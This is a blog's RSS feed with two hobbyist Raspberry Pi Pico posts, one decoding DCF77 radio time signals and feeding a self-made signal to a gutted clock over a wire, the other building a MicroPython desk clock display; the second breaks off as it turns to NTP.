<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="/static/feed.xsl?v=630b5fee" type="text/xsl"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
    <channel>
        <title>deadlime</title>
        <description>Web, programming, dead citrus fruits.</description>
        <lastBuildDate>Sat, 17 Feb 2024 12:17:15 +0000</lastBuildDate>
        <language>en</language>
        <link>https://deadlime.hu/en/</link>
        
            <item>
            <title>Something&#039;s in the air</title>
            <link>https://deadlime.hu/en/2024/01/26/somethings-in-the-air/</link>
            <pubDate>Fri, 26 Jan 2024 11:47:15 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">8c0cb3b5b8c14e0a5e1492082c2360fb</guid>
            <description>Atomic clocks, radio signals, and time synchronization</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/desk_clock.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>The <a href="https://deadlime.hu/en/2023/12/28/the-time-has-not-yet-come/">previous clock-building project</a> made me think that there must be a simpler way. So I just bought a desk clock.</p>
<p>Well, that's not exactly how it happened. I just happen to have more than one time-related stuff to do in parallel. This little project, for example, is about how people had access to accurate time before the Internet.</p>
<p>Of course, they looked out of the window and read the time off of the church tower. Thanks to modern technology, we can do this relatively easily. We just point a camera at the church tower and use artificial intelligence to read the time based on the position of the clock hands.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/tower.jpg" width="400" height="600" alt="" title="" loading="lazy" />
</p>

<p>But it's not that simple. Somehow we have to determine whether it is morning or afternoon and it probably wouldn't hurt to know what the date is. Not to mention if there isn't a church tower in sight.</p>
<p>Observant readers may have noticed that I wouldn't need a desk clock for this. Well, yes, that wasn't the direction I was going, I didn't want to go <em>that much</em> back in time. Actually, I wondered how radio-controlled clocks could work.</p>
<h3>Radio time synchronization</h3>
<p>It all starts with a transmitter tower. From my area, I can pick up the signal sent out by a German tower called DCF77, but there are <a href="https://en.wikipedia.org/wiki/Radio_clock#List_of_radio_time_signal_stations">several other ones</a> covering the whole world.</p>
<p>In the case of the DCF77, the signal is generated from an atomic clock and transmitted in 60 seconds. One bit is received every second. The signal sequence is terminated by an extended pause. However, there is quite a lot of noise, so you may not have enough data when the longer pause arrives, or more likely you may have 59 bits of data before the pause arrives, so depending on reception conditions, it may take quite a while to synchronize.</p>
<p>All we need is a receiver. This is usually done with a ferrite rod antenna and some electronics. It is possible to <a href="https://www.aliexpress.com/w/wholesale-dcf77-receiver.html">order a receiver from China</a>, but I didn't want to wait a month and then deal with the local postal service, so the quickest solution seemed to be to order a cheap radio-controlled clock and inspect it.</p>
<h3>The victim</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/clock_insides.jpg" width="660" height="660" alt="" title="" loading="lazy" />
</p>

<p>Looking inside the clock mentioned earlier, you can see that there is a separate printed circuit board at the bottom and a ferrite rod antenna underneath it. I soldered them out.</p>
<p>The clock has successfully survived the surgery, everything works the same, except that it has lost its (radio signal) hearing.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/emax_6007_v1.jpg" width="660" height="660" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">EMAX 6007 V1<br/>GE16-1055R5<br/>NEW GE13-887</p>

<p>The labels on the radio receiver didn't help me to find any description, but based on other similar boards I figured out that the <code>GND</code> goes to ground, you want 3.3 volts on the <code>VCC</code>, the <code>PON</code> can turn the whole module on and off (but doesn't need to be wired anywhere) and we left with the <code>NTCO</code>, so that must be the data.</p>
<p>I added some more wires with jumper connectors on the end so I could use it with a breadboard, and then I wired the whole thing to a Pico.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring1.jpg" width="660" height="540" alt="" title="" loading="lazy" />
</p>

<p>It would have been nice to get it right the first time. I spent a couple of hours here trying to find out why no data was coming from the antenna. I tried searching for any documentation of the module, connected the <code>PON</code>, tried different GPIO pins on the Pico, and even suspected the code, but in the end, I solved it by connecting the module to a dedicated power source and the Pico only received the data signal. Probably the Pico could not supply enough power to the device.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring2.jpg" width="660" height="540" alt="" title="" loading="lazy" />
</p>

<h3>Bits in the noise</h3>
<p>We see some kind of data coming in, let's do something with it. At first, I just started flashing the LED on the Pico to get feedback on what was happening.</p>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"pico/stdlib.h"</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DCF_PIN 16</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LED_PIN 25</span>

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">on_change</span><span class="hljs-params">(uint gpio, <span class="hljs-keyword">uint32_t</span> event_mask)</span> </span>{
  gpio_put(LED_PIN, event_mask &amp; GPIO_IRQ_EDGE_RISE);
}

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
  gpio_init(DCF_PIN);
  gpio_init(LED_PIN);

  gpio_set_dir(DCF_PIN, GPIO_IN);
  gpio_set_dir(LED_PIN, GPIO_OUT);

  gpio_set_irq_enabled_with_callback(
    DCF_PIN,
    GPIO_IRQ_EDGE_FALL | GPIO_IRQ_EDGE_RISE,
    <span class="hljs-literal">true</span>,
    &amp;on_change
  );

  <span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
    sleep_ms(<span class="hljs-number">1000</span>);
  }
}
</code></pre>
<p>The next step is to start measuring how long the signal is high and low. According to the documentation, <code>0</code> is received when the signal is high for 100 milliseconds, and <code>1</code> is received when the signal is high for 200 milliseconds. Since there is one bit per second, there should be 800-900 milliseconds of low between two high states. In the last second, no data is coming in, so there is a low state for 1800-1900 milliseconds.</p>
<p>First, we define some constant values for noise filtering, to determine whether we got <code>0</code> or <code>1</code> and to detect the end of the data.</p>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MINIMAL_HIGH_PULSE_WIDTH 50</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MINIMAL_LOW_PULSE_WIDTH 700</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> PULSE_WIDTH_THRESHOLD 150</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> END_OF_DATA_PULSE_WIDTH 1500</span>
</code></pre>
<p>Then we will also need some variables to store the time of previous state changes and the data that has arrived so far.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">uint32_t</span> rise_time = <span class="hljs-number">0</span>;
<span class="hljs-keyword">uint32_t</span> fall_time = <span class="hljs-number">0</span>;

<span class="hljs-keyword">uint64_t</span> <span class="hljs-built_in">buffer</span> = <span class="hljs-number">0</span>;
<span class="hljs-keyword">uint32_t</span> buffer_position = <span class="hljs-number">0</span>;
</code></pre>
<p>After that, we only need to write the inside of <code>on_change</code>. We ask the Pico how many milliseconds have elapsed since it was started.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">uint32_t</span> now = to_ms_since_boot(get_absolute_time());
</code></pre>
<p>Then we do some noise filtering, otherwise it would be almost impossible to get the time.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">if</span> (now - fall_time &lt; MINIMAL_LOW_PULSE_WIDTH) {
  <span class="hljs-keyword">return</span>;
}

<span class="hljs-keyword">if</span> (now - rise_time &lt; MINIMAL_HIGH_PULSE_WIDTH) {
  <span class="hljs-keyword">return</span>;
}
</code></pre>
<p>If the signal has gone from low to high, we check to see if the low signal was long enough to indicate the end of the data. If at that point we got 59 bits of data, then all is OK, if not, we start over.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">if</span> (event_mask &amp; GPIO_IRQ_EDGE_RISE) {
  rise_time = now;

  <span class="hljs-keyword">if</span> (rise_time - fall_time &gt; END_OF_DATA_PULSE_WIDTH) {
    <span class="hljs-keyword">if</span> (buffer_position == <span class="hljs-number">59</span>) {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">" - data received: %lld\n"</span>, <span class="hljs-built_in">buffer</span>);
    }
    <span class="hljs-keyword">else</span> {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">" - reset: not enough data\n"</span>);
    }
    <span class="hljs-built_in">buffer</span> = buffer_position = <span class="hljs-number">0</span>;
  }
}
</code></pre>
<p>If the signal went from high to low, we decide whether we got a <code>0</code> or a <code>1</code> based on the length of the signal and store the result in the buffer. Here we may have more data than we need (due to noise), if this is the case we start over.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (event_mask &amp; GPIO_IRQ_EDGE_FALL) {
  fall_time = now;

  <span class="hljs-keyword">uint64_t</span> next_bit = fall_time - rise_time &gt; PULSE_WIDTH_THRESHOLD ? <span class="hljs-number">1</span> : <span class="hljs-number">0</span>;

  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%lld"</span>, next_bit);

  <span class="hljs-built_in">buffer</span> |= next_bit &lt;&lt; buffer_position;
  ++buffer_position;

  <span class="hljs-keyword">if</span> (buffer_position &gt; <span class="hljs-number">59</span>) {
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">" - reset: too much data\n"</span>);
    <span class="hljs-built_in">buffer</span> = buffer_position = <span class="hljs-number">0</span>;
  }
}
</code></pre>
<p>If all goes well, we will have a series of data at the end, hopefully with the current exact time.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2024/debug_output.webm" type="video/webm" />
</video>
<p class="image-caption">The data is flowing in very slowly...</p>

<h3>Let's be sure</h3>
<p>Noise has been mentioned several times, which can be a big problem. In the room where I have my desktop and servers, I have not even been able to extract any usable data. I had to move to another room with a laptop so I could test the code. During the day there was a lot of noise and it took me half an hour to get the exact time, but in the evening I got the data almost every minute.</p>
<p>So we have a bunch of bits, but we don't know if the fact that we thought we got a <code>1</code> actually meant that the other side sent a <code>1</code>. To check this, there are three parity bits in the data, which are <code>0</code> if the data before it has an even number of <code>1</code>s and <code>1</code> if it is odd. First, let's look at how to calculate parity for an arbitrary int:</p>
<pre><code class="hljs arduino"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">parity</span><span class="hljs-params">(<span class="hljs-keyword">int</span> num)</span> </span>{
  num ^= num &gt;&gt; <span class="hljs-number">16</span>;
  num ^= num &gt;&gt; <span class="hljs-number">8</span>;
  num ^= num &gt;&gt; <span class="hljs-number">4</span>;
  num ^= num &gt;&gt; <span class="hljs-number">2</span>;
  num ^= num &gt;&gt; <span class="hljs-number">1</span>;
  <span class="hljs-keyword">return</span> num &amp; <span class="hljs-number">1</span>;
}
</code></pre>
<p>I won't go into the details, the <a href="https://stackoverflow.com/a/21618038">Stack Overflow page</a> I stole the code from has a great explanation. Also, we need to know which ones are the parity bits and what data they are calculated on. We can look this up on the <a href="https://en.wikipedia.org/wiki/DCF77#Time_code_interpretation">related Wikipedia page</a>. For example, for minutes:</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> min_data = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">21</span>) &amp; <span class="hljs-number">0b1111111</span>);
<span class="hljs-keyword">int</span> min_parity = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">28</span>) &amp; <span class="hljs-number">1</span>);

<span class="hljs-keyword">if</span> (parity(min_data) != min_parity) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid parity for minute\n"</span>);
}
</code></pre>
<p>We shift the <code>buffer</code> to the right by 21 bits (effectively discarding the first 21 bits), because the data for the minute starts at bit 22 and we take the first 7 bits (<code>&amp; 0b1111111</code>) because that's how long the minute data is.</p>
<p>For parity, the first 28 bits are discarded and only 1 bit of the remaining data is retained. The parity we calculate should match the parity we got.</p>
<p>The hour and date are checked similarly, only the number of right shifts and the amount of data retained afterward varies.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> hour_data = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">29</span>) &amp; <span class="hljs-number">0b111111</span>);
<span class="hljs-keyword">int</span> hour_parity = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">35</span>) &amp; <span class="hljs-number">1</span>);

<span class="hljs-keyword">if</span> (parity(hour_data) != hour_parity) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid parity for hour\n"</span>);
}

<span class="hljs-keyword">int</span> date_data = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">36</span>) &amp; <span class="hljs-number">0b1111111111111111111111</span>);
<span class="hljs-keyword">int</span> date_parity = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">58</span>) &amp; <span class="hljs-number">1</span>);

<span class="hljs-keyword">if</span> (parity(date_data) != date_parity) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid parity for date\n"</span>);
}
</code></pre>
<h3>It's time</h3>
<p>Once the buffer has passed the checks, all we need to do is extract the data and set the exact time on the Pico. First, let's look at the minutes here too.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> <span class="hljs-built_in">min</span> = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">21</span>) &amp; <span class="hljs-number">0b1111111</span>);
<span class="hljs-built_in">min</span> = (<span class="hljs-built_in">min</span> &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (<span class="hljs-built_in">min</span> &amp; <span class="hljs-number">0b1111</span>);
</code></pre>
<p>The extraction of the data is the same as for parity, but since the data is represented as a <a href="https://en.wikipedia.org/wiki/Binary-coded_decimal">binary-coded decimal</a>, there is a little extra work to do (the first four bits are the first digit, the second four bits (which are only three in this case) are the second digit).</p>
<p>The rest of the data can be obtained similarly, for the day of the week (<code>dow</code>), Sunday comes as a <code>7</code> and Pico wants to get that as a <code>0</code>. Also, for the year, we have to add <code>2000</code> to the value because we only get the last two digits of the year.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> hour = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">29</span>) &amp; <span class="hljs-number">0b111111</span>);
hour = (hour &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (hour &amp; <span class="hljs-number">0b1111</span>);

<span class="hljs-keyword">int</span> dom = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">36</span>) &amp; <span class="hljs-number">0b111111</span>);
dom = (dom &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (dom &amp; <span class="hljs-number">0b1111</span>);

<span class="hljs-keyword">int</span> dow = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">42</span>) &amp; <span class="hljs-number">0b111</span>);
<span class="hljs-keyword">if</span> (dow == <span class="hljs-number">7</span>) {
  dow = <span class="hljs-number">0</span>;
}

<span class="hljs-keyword">int</span> month = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">45</span>) &amp; <span class="hljs-number">0b11111</span>);
month = (month &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (month &amp; <span class="hljs-number">0b1111</span>);

<span class="hljs-keyword">int</span> year = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">50</span>) &amp; <span class="hljs-number">0b11111111</span>);
year = <span class="hljs-number">2000</span> + (year &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (year &amp; <span class="hljs-number">0b1111</span>);
</code></pre>
<p>Now we just have to tell the Pico RTC module what the exact time is.</p>
<pre><code class="hljs arduino">rtc_init();

<span class="hljs-keyword">datetime_t</span> t = {
  .year = (<span class="hljs-keyword">int16_t</span>) year,
  .month = (<span class="hljs-keyword">int8_t</span>) month,
  .day = (<span class="hljs-keyword">int8_t</span>) dom,
  .hour = (<span class="hljs-keyword">int8_t</span>) hour,
  .<span class="hljs-built_in">min</span> = (<span class="hljs-keyword">int8_t</span>) <span class="hljs-built_in">min</span>,
  .sec = <span class="hljs-number">0</span>,
  .dotw = (<span class="hljs-keyword">int8_t</span>) dow,
};

rtc_set_datetime(&amp;t);
</code></pre>
<p>And that's it, we've got the exact time without the Internet.</p>
<h3>The other direction</h3>
<p>We are left with one poor, unfortunate clock that now can't synchronize itself because we've taken the radio module away. Then my dear colleague <a href="https://github.com/potato">potato</a> came up with the idea of giving it a fake signal, so I found myself once again unscrewing the clock and soldering some jumper cables in place of the old module. At first just for the <code>GND</code> and <code>NTCO</code>, but later I wired in the <code>PON</code> as well.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring3.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>I connected it to the Pico and started sending it a signal, but the clock didn't like it so much.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2024/error.mp4" type="video/mp4" />
</video>

<p>At first, I suspected that it was the lack of the <code>PON</code> connection that was causing the problem, that the clock was getting a signal when it wasn't expecting it, so I plugged that in, but the flashing didn't get any better. Then I suspected the soldering, that I might have accidentally shorted something, but after a few minutes of examining it with a magnifying glass, everything looked fine.</p>
<p>Finally, I became suspicious that the Pico was putting out 3.3 volts and the clock was only running on 3 volts, so maybe 3.3 volts was too much for it. I pulled some resistors from a box, but couldn't find one that solved the problem by itself. After connecting one resistor the situation improved, after two it seemed to be fixed, so I finally connected three just in case.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring4.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Now we just need a little bit of code. I tried to replay previously recorded real data, which I repeated every minute, but the clock didn't care. I ran into a few bugs that I sent out the wrong data, but even after correcting these it still didn't work. I tweaked the timing a bit to see if the way I sent it was too accurate or something, but no. In the end, the solution was that the clock wanted to be sure and one data series wasn't enough for it. It needs two successful data series in a row to set the time on itself.</p>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"pico/stdlib.h"</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DCF_SIGNAL_PIN 12</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DCF_ENABLED_PIN 13</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LED_PIN 25</span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
  stdio_init_all();

  gpio_init(DCF_SIGNAL_PIN);
  gpio_init(DCF_ENABLED_PIN);
  gpio_init(LED_PIN);

  gpio_set_dir(DCF_SIGNAL_PIN, GPIO_OUT);
  gpio_set_dir(DCF_ENABLED_PIN, GPIO_IN);
  gpio_set_dir(LED_PIN, GPIO_OUT);

  <span class="hljs-keyword">uint64_t</span> buffers[] = {
    <span class="hljs-comment">//-----PYYYYYYYYMMMMMWWWDDDDDDPHHHHHHPmmmmmmm1AZZARxxxxxxxxxxxxxx0</span>
    <span class="hljs-number">0b0000000010010000001111100001001011100000000101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011110000001101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011110000010101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011100000011101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011110000100101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011100000101101000010100001000100</span>,
  };
  <span class="hljs-keyword">int</span> buffer_idx = <span class="hljs-number">0</span>;

  <span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
    <span class="hljs-keyword">if</span> (gpio_get(DCF_ENABLED_PIN)) {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">"dcf module is not enabled\n"</span>);
      sleep_ms(<span class="hljs-number">5000</span>);
      <span class="hljs-keyword">continue</span>;
    }

    <span class="hljs-keyword">uint64_t</span> b = buffers[buffer_idx];
    ++buffer_idx;

    <span class="hljs-keyword">int</span> length;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">59</span>; ++i) {
      length = b &amp; <span class="hljs-number">1</span> ? <span class="hljs-number">200</span>: <span class="hljs-number">100</span>;
      <span class="hljs-built_in">printf</span>(b &amp; <span class="hljs-number">1</span> ? <span class="hljs-string">"1"</span> : <span class="hljs-string">"0"</span>);

      gpio_put(LED_PIN, <span class="hljs-literal">true</span>);
      gpio_put(DCF_SIGNAL_PIN, <span class="hljs-literal">true</span>);
      sleep_ms(length);

      gpio_put(LED_PIN, <span class="hljs-literal">false</span>);
      gpio_put(DCF_SIGNAL_PIN, <span class="hljs-literal">false</span>);
      sleep_ms(<span class="hljs-number">1000</span> - length);

      b &gt;&gt;= <span class="hljs-number">1</span>;
    }
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"\n"</span>);

    sleep_ms(<span class="hljs-number">1000</span>);
  }
}
</code></pre>
<p>I wanted to avoid to implement the data conversion and bit magic so I just used fixed values for the time. Anyway, the clock starts synchronizing after powering on, and after a few minutes, it sets the &quot;accurate&quot; time it got from the &quot;radio signal&quot;. The LED on the Pico flashes to the beat of the signal.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2024/sync.mp4" type="video/mp4" />
</video>

<p>I think that's the end of our little journey, we've exhausted almost all the entertainment that a cheap radio-controlled clock can offer. There's also a temperature sensor, a Piezo buzzer, and an LED backlight in it for the ones who need more adventure.</p>

]]></content:encoded>
        </item>
            <item>
            <title>The time has (not yet) come</title>
            <link>https://deadlime.hu/en/2023/12/28/the-time-has-not-yet-come/</link>
            <pubDate>Thu, 28 Dec 2023 10:29:46 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">b7a3c87afa7d92f355ff2af77e519afa</guid>
            <description>Creating a desk clock with Raspberry Pi Pico</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_clock.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>I've been thinking for a while now that it would be an interesting project to put together a desk clock. It could have, say, a stopwatch, multiple countdown timers that can run in parallel, maybe displaying temperature and humidity as well, that sort of thing. But life's not that easy, so we won't get that far.</p>
<p>First of all, I ordered some parts:</p>
<ul>
<li>a <a href="https://shop.pimoroni.com/products/pico-gfx-pack">backlit LCD</a> with some buttons on it</li>
<li>a <a href="https://www.raspberrypi.com/documentation/microcontrollers/debug-probe.html">Debug Probe</a>, which I just wanted to try out</li>
<li>and a <a href="https://www.raspberrypi.com/documentation/microcontrollers/raspberry-pi-pico.html">Pico W</a> to power it all</li>
</ul>
<p>Then the fun can begin... after we forget about it all for a month or so.</p>
<h3>C/C++ SDK</h3>
<p>The problems have started to appear with the Debug Probe already.  Although the thing is smaller than if we had converted a Pico, but it cannot power the Pico being debugged, so overall, the more cables made it a bit of a letdown for me.</p>
<p>Regardless of whether it was a Picoprobe or a Debug Probe, in both cases, I needed <a href="https://shop.pimoroni.com/products/pico-omnibus">extra hardware</a> (which I purchased earlier, fortunately) to connect both the display and the probe to the Pico at the same time.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_debug_probe_gfx_pack.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>I've <a href="https://deadlime.hu/en/2022/10/21/the-smallest-pi/">mentioned before</a> that the CLion solution worked quite well on Linux, but on Windows I couldn't get it to work. This is only a problem because I have Linux installed on my laptop and Windows on my desktop and it's inconvenient for me to do longer development projects on a laptop.</p>
<p>So I tried to get it to work on Windows again, this time using WSL2. Things installed nicely in WSL2 according to the Linux guide and with the help of <a href="https://learn.microsoft.com/en-us/windows/wsl/connect-usb"><code>usbipd-win</code></a> I was able to share the Pico with it. CLion has WSL2 support too, so it was able to build the project successfully, but it can't run OpenOCD in WSL2, so unfortunately, debugging didn't work. There is <a href="https://youtrack.jetbrains.com/issue/CPP-32484">a ticket</a> about it, so maybe this will be fixed one day.</p>
<p>This is a good way to get a project abandoned for a while (or forever), but in this case, I had another plan. There is an alternative solution: <a href="https://www.raspberrypi.com/documentation/microcontrollers/micropython.html">MicroPython</a>. If we can let go of the lightning-fast C code, we can write it all in Python. It might even be enough for a prototype.</p>
<h3>MicroPython</h3>
<p>Of course, I was not satisfied with the recommended (working) solution, which was the Python IDE called <a href="https://thonny.org/">Thonny</a>. I have no particular problem with it, but if I already have a PyCharm, I would like to use it. Fortunately, there is a MicroPython plugin for it, which allowed me to upload the code to Pico without any problems.</p>
<p>First, we need to copy the MicroPython UF2 file to the Pico. In our case, we need to use the one <a href="https://github.com/pimoroni/pimoroni-pico/releases">supplied by the LCD display manufacturer</a> so that we can access the modules that drive the LCD. The hardware part is also made considerably simpler this way. No need for the Debug Probe, we can connect the Pico directly to the display.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_gfx_pack.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<h3>Code completion</h3>
<p>Life would obviously be too simple if everything just worked. The first problem was code completion. The MicroPython plugin has some support, but it was not enough. Fortunately, there are <a href="https://peps.python.org/pep-0561/#stub-only-packages">stubs</a> like <a href="https://pypi.org/project/micropython-rp2-pico_w-stubs/"><code>micropython-rp2-pico_w-stubs</code></a> which partially solve the problem, but of course, because of the modified MicroPython, some modules are not known by this stub. Fortunately, the <a href="https://github.com/pimoroni/pimoroni-pico-stubs">vendor has made a stub for their own modules</a>, but I couldn't find an official pip package, so I just downloaded the ZIP and installed it from the filesystem.</p>
<p>I would like to say that everything went smoothly after that... but no. For example, there was the <code>GfxPack</code> class that PyCharm didn't recognize the <code>display</code> property of. I'm not that familiar with stubs, but at a glance that seemed fine:</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">GfxPack</span>:</span>
    <span class="hljs-comment"># ...</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        self.display: PicoGraphics
        self.i2c: PimoroniI2C
</code></pre>
<p>So there may be something wrong with PyCharm. When I modified the stub a bit, it worked well:</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">GfxPack</span>:</span>
    <span class="hljs-comment"># ...</span>

    display: PicoGraphics
    i2c: PimoroniI2C

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        ...
</code></pre>
<p>But now. Everything must be good now, right? Wrong. Let's just say it's usable. There are still some oddities around imports, it doesn't offer to import certain modules, but if I import them manually, it recognizes them.</p>
<p>In any case, we can write code and run it on Pico, but the MicroPytho REPL within PyCharm doesn't work for some reason. We don't see any <code>print</code>s sent to serial or even the stack trace of an exception, which doesn't make life any easier. I can connect to it using PuTTY and it works, but as long as PuTTY is connected to it, PyCharm can't send code to it, so it's a bit inconvenient. I'm sure it would work on Linux.</p>
<h3>The clock</h3>
<p>We should create something clock-like at the end, so we have some sense of achievement. First, I drew the layout on the computer and exported it in <a href="https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format">WBMP</a> format (anyone else remember <a href="https://en.wikipedia.org/wiki/Wireless_Application_Protocol">WAP</a>?), which I could then quite easily read and display on the screen so I could view it on the actual hardware.</p>

<p class="image image-pixelated image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_clock_ui.png" width="512" height="256" alt="" title="" loading="lazy" />
</p>

<pre><code class="hljs python"><span class="hljs-keyword">from</span> gfx_pack <span class="hljs-keyword">import</span> GfxPack


gp = GfxPack()
gp.set_backlight(<span class="hljs-number">0</span>, <span class="hljs-number">180</span>, <span class="hljs-number">60</span>, <span class="hljs-number">140</span>)

<span class="hljs-keyword">with</span> open(<span class="hljs-string">'pico-clock.wbm'</span>, <span class="hljs-string">'rb'</span>) <span class="hljs-keyword">as</span> f:
    buffer = bytearray([b ^ <span class="hljs-number">0xFF</span> <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> f.read()[<span class="hljs-number">-1024</span>:]])

gp.display.set_framebuffer(buffer)
gp.display.update()
</code></pre>
<p>The WBMP format has a variable size header at the beginning, but we know the size of the data because the display (and therefore the image) is 128*64 pixels. Each bit stores the state of one pixel, so the data is (128/8)*64, or 1024 bytes. Fortunately, the format of the framebuffer is exactly the same, so we have an easy job. The image originally appeared as a negative, so we had to invert the bits using <code>b ^ 0xFF</code>.</p>
<p>There were also some minor problems around PyCharm again. It didn't automatically copy the image file to Pico, I had to right-click on the file and press <code>Run 'Flash pico-clock.wbm...'</code> (every time the image was updated).</p>
<p>Now that we have the layout, we can forget about it and finally put together a prototype. The first step would be to get on WiFi and get an accurate time using NTP:</p>
